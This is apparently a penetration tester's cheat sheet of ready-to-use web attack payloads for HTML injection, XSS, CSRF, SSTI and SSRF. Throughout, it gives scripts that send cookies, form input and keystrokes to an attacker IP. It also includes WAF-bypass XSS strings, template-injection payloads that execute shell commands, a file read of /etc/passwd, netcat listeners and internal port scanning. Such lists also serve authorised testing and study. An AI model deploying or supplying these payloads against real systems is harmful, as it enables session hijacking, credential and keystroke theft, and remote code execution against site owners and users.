XSS / HTMLi / (S/C)SRF / SSTI
01. HTML Injection
Basic Test Payloads
<h1>h4rithd was here</h1>
<b>h4rithd was here<b>
<img src="https://media.giphy.com/media/3XpvBjjMWtYYIOtOlp/giphy.gif"/>
<img src="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif"/>
<marquee direction="up">h4rithd was here.</marquee>
<marquee direction="left" behavior="alternate">h4rithd was here</marquee>
<marquee behavior="scroll" direction="up"><img src="https://c.tenor.com/uXWSDlYIKl0AAAAM/danceroblox.gif"/></marquee>02. Cross Site Scripting (XSS)
Steal Cookie
## ------------------| Setup on my machine
#### Basic [h4rithd.js
fetch("http://<IP>/favicon.ico?c="+document.cookie);
#### Encoded
fetch("http://<IP>/favicon.ico?c=" + btoa(document.cookie))
fetch("http://<IP>/favicon.ico?c=" + encodeURIComponent(document.cookie))
## ------------------| Payload
<script src="http://<IP>/h4rithd.js"></script>Payloads
nc -lvnp 80
<script>document.write('<img src="http://<MYIP>/logo.gif?cookie='+document.cookie+'"/>')</script>
<script>new Image().src="http://<MYIP>/logo.jpg?output="+document.cookie;</script>
## ------------------| Common paylods
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efim)``>
<script>alert(123)</script>
<script>location.replace("https://h4rithd.com")</script>
<script>alert(localStorage.authorizations)</script>
<script>alert(JSON.stringify(localStorage))</script>
<img src='https://127.0.0.1/fav.ico?j0k3n='+JSON.stringify(localStorage);'--!>
"/><script>alert(123)</script>
"/><IMG SRC=x onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<img src=http://10.10.14.22/hit/>
<img src=x onerror=this.src='http://10.10.14.22/?cookies='+btoa(document.cookie)/>
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<script>location.replace("https://h4rithd.com")</script>
## ------------------| Other Paylods
<IMG onmouseover="alert('xss')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC= onmouseover="alert('xss')">
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
\<a onmouseover="alert(document.cookie)"\>xss link\</a\>
\<a onmouseover=alert(document.cookie)\>xss link\</a\>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert('XSS')>
## ------------------| WAF Bypass
<svg on onload=(alert)(123)>
<svg onx=() onload=(confirm)(1)>
<x"/onclick=(confirm)()>h4rithd!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img ignored=() src=x onerror=prompt(1)>## ------------------| Host this from your end
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | ping -n 2 10.10.14.22";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);
# catch this via payload
<script src=http://10.10.14.22/script.js></script>Server Side XSS (Dynamic PDF)
## ------------------| Read local file
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");x.send();
</script>
## If you need base64 encoded text, then use thisone.
x.onload=function(){document.write(btoa(this.responseText))};Other APIs
## ------------------| Start the sever for fetch the data
sudo python3 -m http.server 80
## ------------------| Extract stored passwords
<script>
for(let values of document.getElementsByTagName("input")){fetch("http://IP/favicon.ico?data=" + values.value);}
</script>
## ------------------| Keylogers
<script>
function klog(event){fetch("http://IP/favicon.ico?data=" + event.key);}
document.addEventListener('keydown',klog);
</script>03. Cross-Site Request Forgery (CSRF)
Create Payload
<html>
<iframe src="http://MyIP/IFrameIsWorkingFine"></iframe>
<iframe src="http://10.10.10.97/ChangePass?password=Welcome123"></iframe>
</html>04. Server-Side Template Injection (SSTI)
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
#{1+3+3+7}
${{<%[%'"}}%\.
{{.}}
{{user}}
{{config}}
{{password}}
{%include user%}
{%include config%}
{% include config %}
{%include password%}
{{ get_flashed_messages.globals.builtins.open("/etc/passwd").read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
## ------------------| SpringFrameworkβs
{"harithd".replace("a","4")}
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("ping -c 2 <IP>")}Click here for list of payloads.
05. Server-Side Request Forgery (SSRF)
### Setup local web server
sudo python3 -m http.server 80
### Browse URL
### scan localports
/url.php?path=http://localhost:80
wfuzz -u 'http://10.10.10.55:60000/url.php?path=localhost:FUZZ' -z range,1-65535 --hl 2 Gopher [Link]
## ------------------| Test Vuln
### Setup Listener
sudo nc -lvnp 80
### Check if if vuln
### [\n ==> %0a, %25%30%61 (dubbel Encoded) , space ==> %20, %25%32%30 (dubbel Encoded)]
/url.php?path=gopher://<IP>:80/_GET / HTTP/1.0
/url.php?path=gopher://<IP>:80/_GET%%32%30%2fh4rithd.com%25%32%30HTTP/1.1
### Try to send internal requestsLast updated
